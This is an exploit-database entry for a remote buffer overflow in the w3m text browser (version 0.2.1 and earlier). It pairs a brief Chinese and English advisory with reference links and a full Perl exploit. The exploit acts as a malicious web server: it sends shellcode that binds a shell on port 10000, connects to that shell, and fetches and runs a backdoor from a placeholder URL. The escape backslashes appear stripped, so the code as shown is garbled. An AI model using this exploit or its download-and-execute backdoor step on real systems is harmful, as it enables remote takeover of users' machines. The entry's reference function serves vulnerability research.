https://www.exploit-db.com/exploits/20941
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-099

w3m0.2.1以及之前版本存在缓冲区溢出漏洞。远程攻击者借助超长Base64编码MIME头执行任意代码。

source: http://www.securityfocus.com/bid/2895/info

W3M is a pager/text-based WWW browser similiar to lynx.

A buffer overflow vulnerability exists in the 'w3m' client program. The overflow occurs when a base64-encoded string exceeding approximately 32 characters in length is received in a MIME header field. As a result, it may be possible for a malicious remote server to execute arbitrary code on a user's system. 

#!/usr/bin/perl

# ---- exp_w3m.pl
# w3m remote buffer overflow exploit for FreeBSD.
# this fake httpd gives exploit code to visitor's w3m, then
# connects to victim's port 10000, downloads backdoor from
# $backdoor, and executes it.
# see also:
# ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:46.w3m.asc
# 
# 					White_E <[email protected]>
# 					http://ttj.virtualave.net/

$backdoor='http://www.../any.backdoor.prog.you.want';
$ret = 0xbfbffa2c;
$ret -= $ARGV[0];
$retb = pack("V",$ret); # little endian

$shellcode= # http://www.hack.co.za/download.php?sid=1444
            # portbind shell on 10000 by bighawk
"x31xc9xf7xe1x51x41x51x41x51x51xb0x61xcdx80x89".
"xc3x52x66x68x27x10x66x51x89xe6xb1x10x51x56x50".
"x50xb0x68xcdx80x51x53x53xb0x6axcdx80x52x52x53".
"x53xb0x1excdx80xb1x03x89xc3xb0x5ax49x51x53x53".
"xcdx80x41xe2xf5x51x68x2fx2fx73x68x68x2fx62x69".
"x6ex89xe3x51x54x53x53xb0x3bxcdx80"; # 86 bytes

use Socket;
$port=80;
$|=1;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
select(S);$|=1;select(STDOUT);
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
$paddr=sockaddr_in($port,INADDR_ANY);
bind(S,$paddr) || die "ERR: bind()n";
listen(S,SOMAXCONN) || die "ERR: listen()n";
print "listen on $port.n";
$str  = "A" x 36;
$str .= $retb;
$str .= "x90" x 128;
$str .= $shellcode;

while (1) {
  $victim=accept(VIC,S);
  $vaddr=(sockaddr_in($victim))[1];
  select(VIC);$|=1;select(STDOUT);
  $in=<VIC>;
  $in=<VIC>;
  print VIC "HTTP/1.0 200 OKrn";
  print VIC "MIME-Version: 1.0rn";
  print VIC "Content-Type: multipart/mixed; boundary="__=?$strrn";
  print VIC "rn";
  sleep(1);
  socket(BD,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
  $paddr=sockaddr_in('10000',$vaddr) || die "ERR: sockaddr_inn";
  connect(BD,$paddr) || die "ERR: connect()n";
  select(BD);$|=1;select(STDOUT);
  print BD "/usr/local/bin/w3m -dump_source $backdoor > /tmp/hoge ; /bin/chmod +x /tmp/hoge ; 
/tmp/hoge & n";
  print "backdoor has been set.n";
  close(BD);
}

来源:XF
名称:w3m-mime-header-bo(6725)
链接:http://xforce.iss.net/static/6725.php
来源:BID
名称:2895
链接:http://www.securityfocus.com/bid/2895
来源:mi.med.tohoku.ac.jp
链接:http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200106.month/537.html
来源:BUGTRAQ
名称:20010621[SNSAdvisoryNo.32]w3mmalformedMIMEheaderBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/192371
来源:DEBIAN
名称:DSA-081
链接:http://www.debian.org/security/2001/dsa-081
来源:DEBIAN
名称:DSA-064
链接:http://www.debian.org/security/2001/dsa-064
来源:CONECTIVA
名称:CLA-2001:434
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000434